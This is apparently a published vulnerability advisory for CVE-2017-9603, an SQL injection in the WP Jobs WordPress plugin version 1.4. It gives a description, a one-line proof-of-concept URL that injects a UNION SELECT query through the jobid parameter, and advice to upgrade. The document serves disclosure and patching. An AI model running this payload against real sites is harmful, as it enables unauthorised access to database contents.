WordPress Jobs 1.4 SQL Injection

`# Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection  
# Date: 11-06-2017  
# Exploit Author: Dimitrios Tsagkarakis  
# Website: dtsa.eu   
# Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/  
# Vendor Homepage: http://www.intensewp.com/  
# Version: 1.4  
# CVE : CVE-2017-9603  
# Category: webapps  
  
  
  
1. Description:  
  
  
  
SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress  
allows authenticated users to execute arbitrary SQL commands via the jobid  
parameter to wp-admin/edit.php.   
  
  
  
2. Proof of Concept:  
  
  
  
http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j  
obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment  
  
  
  
3. Solution:  
  
  
  
A new version of WP Jobs is available. Update the WordPress WP Jobs to the  
latest version.  
  
  
  
4. Reference:  
  
  
  
http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/  
  
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603  
  
`